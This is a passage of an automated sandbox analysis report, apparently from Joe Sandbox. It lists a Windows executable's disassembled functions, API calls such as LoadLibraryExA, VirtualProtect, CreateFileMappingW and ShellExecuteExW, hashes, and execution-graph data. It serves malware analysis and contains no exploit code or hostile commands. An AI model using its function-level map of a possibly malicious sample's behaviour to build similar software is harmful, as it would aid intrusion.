                      • Part of subcall function 00B6F608: GetClientRect.USER32(?,?), ref: 00B6F6F5
                    • GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
                    • SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                    • String ID: 0
                    • API String ID: 2622349952-4108050209
                    • Opcode ID: e6d59b3c1d051c3b5d6cec5253a887dffd8d3db4a238bba4596fdcee464602f2
                    • Instruction ID: dcc7b1e2f58f84f78799d0b57288c91618e68d11ad7410824c8e32b3b0179318
                    • Opcode Fuzzy Hash: e6d59b3c1d051c3b5d6cec5253a887dffd8d3db4a238bba4596fdcee464602f2
                    • Instruction Fuzzy Hash: BDF08C30104648BADF250F69880DBA93BD8FB15784F0C49B4FC46556A2CB78C990EB94
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF,00B72420,?,?,00B7249F,?,?,?,?,?,00B72489), ref: 00B72309
                    • GetLastError.KERNEL32(?,?,00B7249F,?,?,?,?,?,00B72489), ref: 00B72315
                      • Part of subcall function 00B676E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B67707
                    Strings
                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B7231E
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                    • API String ID: 1091760877-2248577382
                    • Opcode ID: 94514eabb5c15fd469e1ec0ceed2205a75d2e8d207d1ee8fa34b4599a6d2d238
                    • Instruction ID: 423f4f23e80312cac7bd0f2c3f8dd4a6e9a30cfdb4b0a2872d666072527d7b45
                    • Opcode Fuzzy Hash: 94514eabb5c15fd469e1ec0ceed2205a75d2e8d207d1ee8fa34b4599a6d2d238
                    • Instruction Fuzzy Hash: 5BD05B7254C52137C5112328AC0AD6F79959F22734F254795F239571F1CFA4095182A5
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,00B6ED75,?), ref: 00B6F5C3
                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B6ED75,?), ref: 00B6F5D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: FindHandleModuleResource
                    • String ID: RTL
                    • API String ID: 3537982541-834975271
                    • Opcode ID: a6986d22d943306008482836ab8174d96cc9cd120f6e4dc6c02e7d98af55e58e
                    • Instruction ID: bd175292bd48d02e0006566c1be3a2f73e99498220325a8c1370b8ff31caabe8
                    • Opcode Fuzzy Hash: a6986d22d943306008482836ab8174d96cc9cd120f6e4dc6c02e7d98af55e58e
                    • Instruction Fuzzy Hash: 05C0123124535056DA3027717D1DF832ED85B00715F050499B601DB2D0DFEACC428660

                    Execution Graph

                    Execution Coverage:17.8%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:59
                    Total number of Limit Nodes:7
                    execution_graph 11535 de18e0 11536 de18e4 11535->11536 11539 de1bc9 11536->11539 11545 de1ce0 11536->11545 11541 de1bd0 11539->11541 11540 de1cde 11540->11536 11541->11540 11551 de211d 11541->11551 11557 de2168 11541->11557 11562 de2178 11541->11562 11547 de1cb7 11545->11547 11546 de1cde 11546->11536 11547->11546 11548 de211d 3 API calls 11547->11548 11549 de2178 3 API calls 11547->11549 11550 de2168 3 API calls 11547->11550 11548->11547 11549->11547 11550->11547 11552 de20dd 11551->11552 11553 de2125 11551->11553 11567 de2d6b 11553->11567 11572 de2bc8 11553->11572 11554 de227e 11554->11554 11558 de219d 11557->11558 11560 de2d6b 3 API calls 11558->11560 11561 de2bc8 3 API calls 11558->11561 11559 de227e 11560->11559 11561->11559 11563 de219d 11562->11563 11565 de2d6b 3 API calls 11563->11565 11566 de2bc8 3 API calls 11563->11566 11564 de227e 11564->11564 11565->11564 11566->11564 11568 de2d93 11567->11568 11569 de3062 11568->11569 11577 de79ea 11568->11577 11581 de79f0 11568->11581 11569->11554 11573 de2bcd 11572->11573 11574 de2d4b 11573->11574 11575 de79ea 3 API calls 11573->11575 11576 de79f0 3 API calls 11573->11576 11574->11554 11575->11574 11576->11574 11578 de7a15 11577->11578 11585 de7c80 11578->11585 11579 de7a77 11579->11569 11582 de7a15 11581->11582 11584 de7c80 3 API calls 11582->11584 11583 de7a77 11583->11569 11584->11583 11589 de80ba 11585->11589 11597 de80c8 11585->11597 11586 de7c9e 11586->11579 11590 de80fd 11589->11590 11591 de80d5 11589->11591 11605 de7cb8 11590->11605 11591->11586 11593 de811e 11593->11586 11595 de81e6 GlobalMemoryStatusEx 11596 de8216 11595->11596 11596->11586 11598 de80fd 11597->11598 11599 de80d5 11597->11599 11600 de7cb8 GlobalMemoryStatusEx 11598->11600 11599->11586 11602 de811a 11600->11602 11601 de811e 11601->11586 11602->11601 11603 de81e6 GlobalMemoryStatusEx 11602->11603 11604 de8216 11603->11604 11604->11586 11606 de81a0 GlobalMemoryStatusEx 11605->11606 11608 de811a 11606->11608 11608->11593 11608->11595

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1534 de80c8-de80d3 1535 de80fd-de811c call de7cb8 1534->1535 1536 de80d5-de80fc call de632c 1534->1536 1542 de811e-de8121 1535->1542 1543 de8122-de8181 1535->1543 1550 de8187-de8214 GlobalMemoryStatusEx 1543->1550 1551 de8183-de8186 1543->1551 1555 de821d-de8245 1550->1555 1556 de8216-de821c 1550->1556 1556->1555
                    Memory Dump Source
                    • Source File: 00000002.00000002.4148964631.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_de0000_3.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 574e3909e5bd5c3c5f202ede80a9405a59f1a2f3caee1bd9d4970071fdf11126
                    • Instruction ID: cebb4ed9154493e8ee551320618d2c987c6ad42269ee4048aea873a9de83aeb8
                    • Opcode Fuzzy Hash: 574e3909e5bd5c3c5f202ede80a9405a59f1a2f3caee1bd9d4970071fdf11126
                    • Instruction Fuzzy Hash: 6E41F272D043958FCB04EFBAD84429EBBF1EF89310F18856AD948A7351DB389945CBE1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1559 de7cb8-de8214 GlobalMemoryStatusEx 1563 de821d-de8245 1559->1563 1564 de8216-de821c 1559->1564 1564->1563
                    APIs
                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00DE811A), ref: 00DE8207
                    Memory Dump Source
                    • Source File: 00000002.00000002.4148964631.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_de0000_3.jbxd
                    Similarity
                    • API ID: GlobalMemoryStatus
                    • String ID:
                    • API String ID: 1890195054-0
                    • Opcode ID: 366d279761a6f5a4e783d0ab5b195344ff67f90882eae5e59f09ab4cd7dff5f2
                    • Instruction ID: 2d9675b71adf086c4f4eee18813aaf317dec866768b37549fab53d1c1bc96bfb
                    • Opcode Fuzzy Hash: 366d279761a6f5a4e783d0ab5b195344ff67f90882eae5e59f09ab4cd7dff5f2
                    • Instruction Fuzzy Hash: 3C1100B1C00669DFCB10DF9AC544B9EFBB4AB48320F24816AE958A7250D778A944CFA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1567 de8198-de819c 1568 de819e-de81a6 1567->1568 1569 de81a9-de81de 1567->1569 1568->1569 1570 de81e6-de8214 GlobalMemoryStatusEx 1569->1570 1571 de821d-de8245 1570->1571 1572 de8216-de821c 1570->1572 1572->1571
                    APIs
                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00DE811A), ref: 00DE8207
                    Memory Dump Source
                    • Source File: 00000002.00000002.4148964631.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_de0000_3.jbxd
                    Similarity
                    • API ID: GlobalMemoryStatus
                    • String ID:
                    • API String ID: 1890195054-0
                    • Opcode ID: 1797ee250183c54926dcf419c25230001e1ef0b763fb57d7969e712695fc6929
                    • Instruction ID: 02de5512ada21657e8d121a9c8186f5ba4e252fd165273ab278c73fad3eb92cf
                    • Opcode Fuzzy Hash: 1797ee250183c54926dcf419c25230001e1ef0b763fb57d7969e712695fc6929
                    • Instruction Fuzzy Hash: 5D1142B2C00659CBCB10CF9AC644BDEFBF4AF08320F24816AD458B7210D778A940CFA5

                    Execution Graph

                    Execution Coverage:9.8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:1582
                    Total number of Limit Nodes:33
                    execution_graph 26059 efc66e 27 API calls CatchGuardHandler 26029 eebde0 73 API calls 26076 ef73e0 QueryPerformanceFrequency QueryPerformanceCounter 23979 ed13fd 43 API calls 2 library calls 26030 f005e1 21 API calls __vsnwprintf_l 23995 eef6f5 23996 eef6a3 23995->23996 23998 eef9e9 23996->23998 24024 eef747 23998->24024 24000 eef9f9 24001 eefa7a 24000->24001 24002 eefa56 24000->24002 24005 eefaf2 LoadLibraryExA 24001->24005 24007 eefb53 24001->24007 24009 eefb65 24001->24009 24012 eefc21 24001->24012 24003 eef987 DloadReleaseSectionWriteAccess 6 API calls 24002->24003 24004 eefa61 RaiseException 24003->24004 24019 eefc4f 24004->24019 24006 eefb05 GetLastError 24005->24006 24005->24007 24010 eefb2e 24006->24010 24018 eefb18 24006->24018 24008 eefb5e FreeLibrary 24007->24008 24007->24009 24008->24009 24011 eefbc3 GetProcAddress 24009->24011 24009->24012 24013 eef987 DloadReleaseSectionWriteAccess 6 API calls 24010->24013 24011->24012 24014 eefbd3 GetLastError 24011->24014 24033 eef987 24012->24033 24015 eefb39 RaiseException 24013->24015 24016 eefbe6 24014->24016 24015->24019 24016->24012 24020 eef987 DloadReleaseSectionWriteAccess 6 API calls 24016->24020 24018->24007 24018->24010 24019->23996 24021 eefc07 RaiseException 24020->24021 24022 eef747 ___delayLoadHelper2@8 6 API calls 24021->24022 24023 eefc1e 24022->24023 24023->24012 24025 eef779 24024->24025 24026 eef753 24024->24026 24025->24000 24041 eef7f0 24026->24041 24028 eef758 24029 eef774 24028->24029 24044 eef919 24028->24044 24049 eef77a GetModuleHandleW GetProcAddress GetProcAddress 24029->24049 24032 eef9c2 24032->24000 24034 eef9bb 24033->24034 24035 eef999 24033->24035 24034->24019 24036 eef7f0 DloadReleaseSectionWriteAccess 3 API calls 24035->24036 24038 eef99e 24036->24038 24037 eef9b6 24052 eef9bd GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24037->24052 24038->24037 24040 eef919 DloadProtectSection 3 API calls 24038->24040 24040->24037 24050 eef77a GetModuleHandleW GetProcAddress GetProcAddress 24041->24050 24043 eef7f5 24043->24028 24045 eef92e DloadProtectSection 24044->24045 24046 eef969 VirtualProtect 24045->24046 24047 eef934 24045->24047 24051 eef82f VirtualQuery GetSystemInfo 24045->24051 24046->24047 24047->24029 24049->24032 24050->24043 24051->24046 24052->24034 26060 eec2f3 78 API calls 24056 efccf0 24057 efcd02 24056->24057 24058 efccf9 24056->24058 24060 efcbe7 24058->24060 24080 efa515 GetLastError 24060->24080 24062 efcbf4 24100 efcd0e 24062->24100 24064 efcbfc 24109 efc97b 24064->24109 24067 efcc13 24067->24057 24070 efcc56 24134 efa66a 24070->24134 24074 efcc51 24133 efa7eb 20 API calls __dosmaperr 24074->24133 24076 efcc9a 24076->24070 24140 efc851 26 API calls 24076->24140 24077 efcc6e 24077->24076 24078 efa66a _free 20 API calls 24077->24078 24078->24076 24081 efa52b 24080->24081 24082 efa531 24080->24082 24141 efc01b 11 API calls 2 library calls 24081->24141 24085 efa580 SetLastError 24082->24085 24142 efc2f6 24082->24142 24085->24062 24087 efa54b 24090 efa66a _free 20 API calls 24087->24090 24089 efa560 24089->24087 24091 efa567 24089->24091 24092 efa551 24090->24092 24150 efa380 20 API calls __dosmaperr 24091->24150 24094 efa58c SetLastError 24092->24094 24151 efa0f4 38 API calls _abort 24094->24151 24095 efa572 24097 efa66a _free 20 API calls 24095->24097 24099 efa579 24097->24099 24099->24085 24099->24094 24101 efcd1a __FrameHandler3::FrameUnwindToState 24100->24101 24102 efa515 _unexpected 38 API calls 24101->24102 24107 efcd24 24102->24107 24104 efcda8 _abort 24104->24064 24107->24104 24108 efa66a _free 20 API calls 24107->24108 24154 efa0f4 38 API calls _abort 24107->24154 24155 efbdf1 EnterCriticalSection 24107->24155 24156 efcd9f LeaveCriticalSection _abort 24107->24156 24108->24107 24157 ef5944 24109->24157 24112 efc9ae 24114 efc9c5 24112->24114 24115 efc9b3 GetACP 24112->24115 24113 efc99c GetOEMCP 24113->24114 24114->24067 24116 efa7fe 24114->24116 24115->24114 24117 efa83c 24116->24117 24121 efa80c __dosmaperr 24116->24121 24168 efa7eb 20 API calls __dosmaperr 24117->24168 24119 efa827 RtlAllocateHeap 24120 efa83a 24119->24120 24119->24121 24120->24070 24123 efcdb0 24120->24123 24121->24117 24121->24119 24167 ef8e5c 7 API calls 2 library calls 24121->24167 24124 efc97b 40 API calls 24123->24124 24125 efcdcf 24124->24125 24128 efce20 IsValidCodePage 24125->24128 24130 efcdd6 24125->24130 24132 efce45 __cftof 24125->24132 24127 efcc49 24127->24074 24127->24077 24129 efce32 GetCPInfo 24128->24129 24128->24130 24129->24130 24129->24132 24179 ef0d7c 24130->24179 24169 efca53 GetCPInfo 24132->24169 24133->24070 24135 efa675 RtlFreeHeap 24134->24135 24136 efa69e __dosmaperr 24134->24136 24135->24136 24137 efa68a 24135->24137 24136->24067 24260 efa7eb 20 API calls __dosmaperr 24137->24260 24139 efa690 GetLastError 24139->24136 24140->24070 24141->24082 24148 efc303 __dosmaperr 24142->24148 24143 efc343 24153 efa7eb 20 API calls __dosmaperr 24143->24153 24144 efc32e RtlAllocateHeap 24145 efa543 24144->24145 24144->24148 24145->24087 24149 efc071 11 API calls 2 library calls 24145->24149 24148->24143 24148->24144 24152 ef8e5c 7 API calls 2 library calls 24148->24152 24149->24089 24150->24095 24152->24148 24153->24145 24155->24107 24156->24107 24158 ef5957 24157->24158 24159 ef5961 24157->24159 24158->24112 24158->24113 24159->24158 24160 efa515 _unexpected 38 API calls 24159->24160 24161 ef5982 24160->24161 24165 efaaf6 38 API calls __fassign 24161->24165 24163 ef599b 24166 efab23 38 API calls __fassign 24163->24166 24165->24163 24166->24158 24167->24121 24168->24120 24170 efcb37 24169->24170 24174 efca8d 24169->24174 24173 ef0d7c CatchGuardHandler 5 API calls 24170->24173 24176 efcbe3 24173->24176 24186 efdb48 24174->24186 24176->24130 24178 efbd38 __vsnwprintf_l 43 API calls 24178->24170 24180 ef0d85 IsProcessorFeaturePresent 24179->24180 24181 ef0d84 24179->24181 24183 ef0dc7 24180->24183 24181->24127 24259 ef0d8a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24183->24259 24185 ef0eaa 24185->24127 24187 ef5944 __fassign 38 API calls 24186->24187 24188 efdb68 MultiByteToWideChar 24187->24188 24190 efdc3e 24188->24190 24191 efdba6 24188->24191 24192 ef0d7c CatchGuardHandler 5 API calls 24190->24192 24193 efa7fe __vsnwprintf_l 21 API calls 24191->24193 24197 efdbc7 __cftof __vsnwprintf_l 24191->24197 24194 efcaee 24192->24194 24193->24197 24200 efbd38 24194->24200 24195 efdc38 24205 efbd83 20 API calls _free 24195->24205 24197->24195 24198 efdc0c MultiByteToWideChar 24197->24198 24198->24195 24199 efdc28 GetStringTypeW 24198->24199 24199->24195 24201 ef5944 __fassign 38 API calls 24200->24201 24202 efbd4b 24201->24202 24206 efbb1b 24202->24206 24205->24190 24207 efbb36 __vsnwprintf_l 24206->24207 24208 efbb5c MultiByteToWideChar 24207->24208 24209 efbb86 24208->24209 24210 efbd10 24208->24210 24213 efa7fe __vsnwprintf_l 21 API calls 24209->24213 24216 efbba7 __vsnwprintf_l 24209->24216 24211 ef0d7c CatchGuardHandler 5 API calls 24210->24211 24212 efbd23 24211->24212 24212->24178 24213->24216 24214 efbc5c 24242 efbd83 20 API calls _free 24214->24242 24215 efbbf0 MultiByteToWideChar 24215->24214 24217 efbc09 24215->24217 24216->24214 24216->24215 24233 efc12c 24217->24233 24221 efbc6b 24225 efa7fe __vsnwprintf_l 21 API calls 24221->24225 24228 efbc8c __vsnwprintf_l 24221->24228 24222 efbc33 24222->24214 24223 efc12c __vsnwprintf_l 11 API calls 24222->24223 24223->24214 24224 efbd01 24241 efbd83 20 API calls _free 24224->24241 24225->24228 24226 efc12c __vsnwprintf_l 11 API calls 24229 efbce0 24226->24229 24228->24224 24228->24226 24229->24224 24230 efbcef WideCharToMultiByte 24229->24230 24230->24224 24231 efbd2f 24230->24231 24243 efbd83 20 API calls _free 24231->24243 24244 efbe58 24233->24244 24236 efc15c 24239 ef0d7c CatchGuardHandler 5 API calls 24236->24239 24238 efc19c LCMapStringW 24238->24236 24240 efbc20 24239->24240 24240->24214 24240->24221 24240->24222 24241->24214 24242->24210 24243->24214 24245 efbe84 24244->24245 24246 efbe88 24244->24246 24245->24246 24249 efbea8 24245->24249 24252 efbef4 24245->24252 24246->24236 24251 efc1b4 10 API calls 3 library calls 24246->24251 24248 efbeb4 GetProcAddress 24250 efbec4 __dosmaperr 24248->24250 24249->24246 24249->24248 24250->24246 24251->24238 24253 efbf15 LoadLibraryExW 24252->24253 24258 efbf0a 24252->24258 24254 efbf32 GetLastError 24253->24254 24257 efbf4a 24253->24257 24255 efbf3d LoadLibraryExW 24254->24255 24254->24257 24255->24257 24256 efbf61 FreeLibrary 24256->24258 24257->24256 24257->24258 24258->24245 24259->24185 24260->24139 25998 ef10f0 LocalFree 26031 efd1f0 GetProcessHeap 26032 eeedf1 DialogBoxParamW 26078 eed8d8 102 API calls 4 library calls 26000 efb8c0 21 API calls 26001 ef9cc0 7 API calls ___scrt_uninitialize_crt 26036 f03dc0 VariantClear 26079 f003c0 51 API calls 24271 edacd4 24274 edacde 24271->24274 24272 edae2c SetFilePointer 24273 edae49 GetLastError 24272->24273 24275 edacf4 24272->24275 24273->24275 24274->24272 24274->24275 24276 edae05 24274->24276 24278 edaa7a 24274->24278 24276->24272 24279 edaa93 24278->24279 24282 edb110 24279->24282 24283 edb122 24282->24283 24288 edb135 24282->24288 24285 edaac5 24283->24285 24291 ed7800 77 API calls 24283->24291 24284 edb148 SetFilePointer 24284->24285 24287 edb164 GetLastError 24284->24287 24285->24276 24287->24285 24289 edb16e 24287->24289 24288->24284 24288->24285 24289->24285 24292 ed7800 77 API calls 24289->24292 24291->24288 24292->24285 24295 eec9d0 24296 eec9da __EH_prolog 24295->24296 24466 ed12f6 24296->24466 24299 eeca1a 24302 eeca31 24299->24302 24304 eeca8b 24299->24304 24305 eeca28 24299->24305 24300 eed10b 24555 eee7ee 24300->24555 24308 eecb1e GetDlgItemTextW 24304->24308 24314 eecaa1 24304->24314 24309 eeca2c 24305->24309 24310 eeca68 24305->24310 24306 eed126 SendMessageW 24307 eed134 24306->24307 24312 eed14e GetDlgItem SendMessageW 24307->24312 24313 eed13d SendDlgItemMessageW 24307->24313 24308->24310 24311 eecb5b 24308->24311 24309->24302 24315 edf937 53 API calls 24309->24315 24310->24302 24317 eecb4f KiUserCallbackDispatcher 24310->24317 24318 eecb70 GetDlgItem 24311->24318 24464 eecb64 24311->24464 24573 eeb65d GetCurrentDirectoryW 24312->24573 24313->24312 24319 edf937 53 API calls 24314->24319 24320 eeca4b 24315->24320 24317->24302 24322 eecba7 SetFocus 24318->24322 24323 eecb84 SendMessageW SendMessageW 24318->24323 24324 eecabe SetDlgItemTextW 24319->24324 24595 ed122f SHGetMalloc 24320->24595 24321 eed17e GetDlgItem 24326 eed19b 24321->24326 24327 eed1a1 SetWindowTextW 24321->24327 24328 eecbb7 24322->24328 24342 eecbc3 24322->24342 24323->24322 24329 eecac9 24324->24329 24326->24327 24574 eebbc0 GetClassNameW 24327->24574 24332 edf937 53 API calls 24328->24332 24329->24302 24335 eecad6 GetMessageW 24329->24335 24330 eed051 24333 edf937 53 API calls 24330->24333 24336 eecbc1 24332->24336 24338 eed061 SetDlgItemTextW 24333->24338 24335->24302 24340 eecaed IsDialogMessageW 24335->24340 24476 eee619 24336->24476 24337 eed3f8 SetDlgItemTextW 24337->24302 24344 eed075 24338->24344 24340->24329 24341 eecafc TranslateMessage DispatchMessageW 24340->24341 24341->24329 24346 edf937 53 API calls 24342->24346 24348 edf937 53 API calls 24344->24348 24350 eecbfa 24346->24350 24347 eecc1d 24354 eecc51 24347->24354 24596 edb4c1 24347->24596 24383 eed098 _wcslen 24348->24383 24349 eed1ec 24352 eed21c 24349->24352 24357 edf937 53 API calls 24349->24357 24353 ed4a20 _swprintf 51 API calls 24350->24353 24351 eed884 97 API calls 24351->24349 24362 eed884 97 API calls 24352->24362 24418 eed2d4 24352->24418 24353->24336 24486 edb341 24354->24486 24361 eed1ff SetDlgItemTextW 24357->24361 24358 eed387 24364 eed399 24358->24364 24365 eed390 EnableWindow 24358->24365 24369 edf937 53 API calls 24361->24369 24370 eed237 24362->24370 24363 eecc4b 24599 eebeff CreateDirectoryW LocalFree GetCurrentProcess GetLastError 24363->24599 24372 eed3b6 24364->24372 24608 ed12b3 GetDlgItem EnableWindow 24364->24608 24365->24364 24366 eed0e9 24375 edf937 53 API calls 24366->24375 24367 eecc75 24492 eebc19 SetCurrentDirectoryW 24367->24492 24368 eecc6a GetLastError 24368->24367 24373 eed213 SetDlgItemTextW 24369->24373 24380 eed249 24370->24380 24403 eed26e 24370->24403 24378 eed3dd 24372->24378 24392 eed3d5 SendMessageW 24372->24392 24373->24352 24375->24302 24376 eed2c7 24386 eed884 97 API calls 24376->24386 24378->24302 24388 edf937 53 API calls 24378->24388 24379 eecc89 24384 eecc92 GetLastError 24379->24384 24385 eecca0 24379->24385 24606 eeaef5 32 API calls 24380->24606 24382 eed3ac 24609 ed12b3 GetDlgItem EnableWindow 24382->24609 24383->24366 24391 edf937 53 API calls 24383->24391 24384->24385 24387 eecd17 24385->24387 24393 eecd26 24385->24393 24394 eeccb0 GetTickCount 24385->24394 24386->24418 24387->24393 24397 eecf52 24387->24397 24395 eeca52 24388->24395 24389 eed262 24389->24403 24396 eed0cc 24391->24396 24392->24378 24399 eecd3f GetModuleFileNameW 24393->24399 24400 eeceed 24393->24400 24405 eecef7 24393->24405 24493 ed4a20 24394->24493 24395->24302 24395->24337 24404 ed4a20 _swprintf 51 API calls 24396->24404 24511 ed12d1 GetDlgItem ShowWindow 24397->24511 24398 eed365 24607 eeaef5 32 API calls 24398->24607 24600 ee05ed 82 API calls 24399->24600 24400->24310 24400->24405 24403->24376 24413 eed884 97 API calls 24403->24413 24404->24366 24412 edf937 53 API calls 24405->24412 24407 eecf62 24512 ed12d1 GetDlgItem ShowWindow 24407->24512 24408 eecccd 24496 eda8ce 24408->24496 24409 edf937 53 API calls 24409->24418 24411 eed384 24411->24358 24416 eecf01 24412->24416 24417 eed29c 24413->24417 24415 eecd67 24420 ed4a20 _swprintf 51 API calls 24415->24420 24421 ed4a20 _swprintf 51 API calls 24416->24421 24417->24376 24422 eed2a5 DialogBoxParamW 24417->24422 24418->24358 24418->24398 24418->24409 24419 eecf6c 24513 edf937 24419->24513 24424 eecd89 CreateFileMappingW 24420->24424 24426 eecf1f 24421->24426 24422->24310 24422->24376 24429 eecde7 GetCommandLineW 24424->24429 24458 eece5e __InternalCxxFrameHandler 24424->24458 24438 edf937 53 API calls 24426->24438 24428 eeccf3 24433 eeccfa GetLastError 24428->24433 24434 eecd05 24428->24434 24432 eecdf8 24429->24432 24430 eece69 ShellExecuteExW 24456 eece84 24430->24456 24601 eec615 SHGetMalloc 24432->24601 24433->24434 24504 eda801 24434->24504 24435 eecf88 SetDlgItemTextW GetDlgItem 24439 eecfbd 24435->24439 24440 eecfa5 GetWindowLongW SetWindowLongW 24435->24440 24442 eecf39 24438->24442 24518 eed884 24439->24518 24440->24439 24441 eece14 24602 eec615 SHGetMalloc 24441->24602 24446 eece20 24603 eec615 SHGetMalloc 24446->24603 24447 eecec7 24447->24400 24453 eecedd UnmapViewOfFile CloseHandle 24447->24453 24448 eed884 97 API calls 24450 eecfd9 24448->24450 24543 eeeba2 24450->24543 24451 eece2c 24604 ee069c 82 API calls 24451->24604 24453->24400 24455 eece3d MapViewOfFile 24455->24458 24456->24447 24459 eeceb3 Sleep 24456->24459 24458->24430 24459->24447 24459->24456 24460 eed884 97 API calls 24463 eecfff 24460->24463 24461 eed028 24605 ed12b3 GetDlgItem EnableWindow 24461->24605 24463->24461 24465 eed884 97 API calls 24463->24465 24464->24310 24464->24330 24465->24461 24467 ed12ff 24466->24467 24468 ed1358 24466->24468 24470 ed1365 24467->24470 24610 edf608 62 API calls 2 library calls 24467->24610 24611 edf5e1 GetWindowLongW SetWindowLongW 24468->24611 24470->24299 24470->24300 24470->24302 24472 ed1321 24472->24470 24473 ed1334 GetDlgItem 24472->24473 24473->24470 24474 ed1344 24473->24474 24474->24470 24475 ed134a SetWindowTextW 24474->24475 24475->24470 24612 eec758 PeekMessageW 24476->24612 24479 eee67b SendMessageW SendMessageW 24481 eee6d6 SendMessageW SendMessageW SendMessageW 24479->24481 24482 eee6b7 24479->24482 24480 eee647 24483 eee652 ShowWindow SendMessageW SendMessageW 24480->24483 24484 eee72c SendMessageW 24481->24484 24485 eee709 SendMessageW 24481->24485 24482->24481 24483->24479 24484->24347 24485->24484 24487 edb34b 24486->24487 24488 edb405 24487->24488 24489 edb3dc 24487->24489 24617 edb542 24487->24617 24488->24367 24488->24368 24489->24488 24490 edb542 8 API calls 24489->24490 24490->24488 24492->24379 24644 ed49f3 24493->24644 24497 eda8d8 24496->24497 24498 eda935 CreateFileW 24497->24498 24499 eda929 24497->24499 24498->24499 24500 eda97f 24499->24500 24501 edcf32 GetCurrentDirectoryW 24499->24501 24500->24428 24502 eda964 24501->24502 24502->24500 24503 eda968 CreateFileW 24502->24503 24503->24500 24505 eda836 24504->24505 24506 eda825 24504->24506 24505->24387 24506->24505 24507 eda838 24506->24507 24508 eda831 24506->24508 24678 eda880 24507->24678 24673 eda9ae 24508->24673 24511->24407 24512->24419 24514 edf947 24513->24514 24693 edf968 24514->24693 24517 ed12d1 GetDlgItem ShowWindow 24517->24435 24519 eed88e __EH_prolog 24518->24519 24520 eecfcb 24519->24520 24716 eec504 24519->24716 24520->24448 24523 eec504 ExpandEnvironmentStringsW 24527 eed8c5 _wcslen _wcsrchr 24523->24527 24524 eedbac SetWindowTextW 24524->24527 24527->24520 24527->24523 24527->24524 24530 eed99a SetFileAttributesW 24527->24530 24535 eedd76 GetDlgItem SetWindowTextW SendMessageW 24527->24535 24538 eeddb6 SendMessageW 24527->24538 24720 ee3316 CompareStringW 24527->24720 24721 eeb65d GetCurrentDirectoryW 24527->24721 24723 edb9ca 6 